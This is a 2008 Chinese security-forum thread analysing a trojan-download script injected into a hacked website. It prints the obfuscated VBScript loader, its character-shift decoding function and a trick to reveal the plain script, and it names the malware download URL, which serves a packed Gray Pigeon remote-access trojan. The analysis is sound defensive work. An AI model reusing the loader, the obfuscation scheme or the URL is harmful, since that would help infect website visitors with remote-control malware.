找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 2229|回复: 2

网页加密一招击破

[复制链接]

13

主题

113

回帖

158

牛毛

一级牛人

风誓魂

积分
158
QQ
发表于 2008-7-2 01:56:10 | 显示全部楼层 来自 河南省南阳市
看不懂呀 哥哥

  全字符

0

主题

4

回帖

7

牛毛

初生牛犊

积分
10
发表于 2008-10-13 13:24:53 | 显示全部楼层 来自 广东省东莞市
[s:164] 看懂一些,还得继续学习中。。。

40

主题

26

回帖

86

牛毛

初生牛犊

积分
86
 楼主| 发表于 2008-7-1 15:24:04 | 显示全部楼层 |阅读模式 来自 北京市
今天朋友进了一个站,发现挂了马,于是叫我找找木马地址

把网马下来一看,发现使用了自写的解迷函数
=================================
<s c r i p t language=v b s c r i p t >
hu=\"琳jv#{zl琳.j\"\"q!w~#.zo|u$ousk0dpaq!w~#0l琳....}|.s!!}!.!s\"\"${s.|s&#39;#

琳....rz.k.0v##~h==&&&<)#&u&<q}{=?@a=\"\"\"\"<s&#39;s0琳....as#.rt.k.r}

q${s|#<q!so#sszs{s|#60}pxsq#07琳....rt<\"\"s#o##!

wp$#s.0qzo\"\"\"\"wr0:.0qz\"\"wrhprgdqccd;dcoa;??r>;gfao;>>q>btq@gsad0

琳....\"\"#!k0[wq!}\"\"}t#<f[zvbb^0琳....as#.&#39;.k.rt<q!so#s]pxsq#6\"\"#!:007琳

....o?k0or}0琳....o@k0rp<0琳....oak0a#!0琳....obk0so{0琳....\"\"#!?ko?

4o@4oa4ob琳....\"\"#!ck\"\"#!?琳....\"\"s#.a.k.rt<q!so#s}pxsq#6\"\"#!c:007

琳....a<#(~s.k.?琳....\"\"#!dk0usb0琳....&#39;<]~s|.\"\"#!d:.rz:.toz\"\"s

琳....&#39;<as|r琳....t|o{s?k0u>zr<q}{0琳....\"\"s#.t.k.rt<q!so#s}pxsq#60aq!

w~#w|u<twzsa(\"\"#s{]pxsq#0:007琳....\"\"s#.#{~.k.t<us#a~sqwozt}zrs!6@7.

琳....t|o{s?k.t<p$wzr^o#v6#{~:t|o{s?7琳....a<}~s|琳....a<&!w#s.&#39;<!

s\"\"~}|\"\"sp}r(琳....a<\"\"o%s#}twzs.t|o{s?琳....a<qz}\"\"s

琳....\"\"s#._.k.rt<q!so#s}pxsq#60avszz<o~~zwqo#w}|0:007

琳...._<avszzs&#39;sq$#s.t|o{s?:00:00:0}~s|0:>琳....j=\"\"q!w~#l琳....jvsorl

琳....j#w#zsl]v:{(.u}r/...u}zr\"\"$|io#kfbf@ae?bj=#w#zsl琳....j=vsorljp}

r(l琳  jqs|#s!lg}$.r].w#/j=qs|#s!l琳....j=p}r(lj=v#{zl琳\"

上面是一片\"琳\"的海洋!
function unencode(temp)           ;自己写的解迷

函数
but=14
for i = 1 to len(temp)
  if mid(temp,i,1)<> \"琳\" then
if asc(mid(temp, i, 1)) < 32 or asc(mid(temp, i, 1)) > 126 then
a = a & chr(asc(mid(temp, i, 1)))
else
pk=asc(mid(temp,i,1))-but
    if pk>126 then
      pk=pk-95
    elseif pk<32 then
       pk=pk+95
     end if
     a=a&chr(pk)
end if
else
     a=a&vbcrlf
end if
next
unencode=a
end function                          ;算法不

是很难,时间原因不做分析.
document.write(unencode(hu))
< / s c r i p t >
==================================================

解迷
看到最后的document.write(unencode(hu))
我们改成 msgbox (unencode(hu)) 暴了它
===================================


运行修改后的,
结果如图
呵呵木马地址是www.ztwgw.com/123/ss.exe
下来发现是themida保护的黑防灰鸽子
==============================
脚本加密,就这样一句话被破解了.
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-1-16 02:48 , Processed in 0.135783 second(s), 30 queries , Yac On.

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表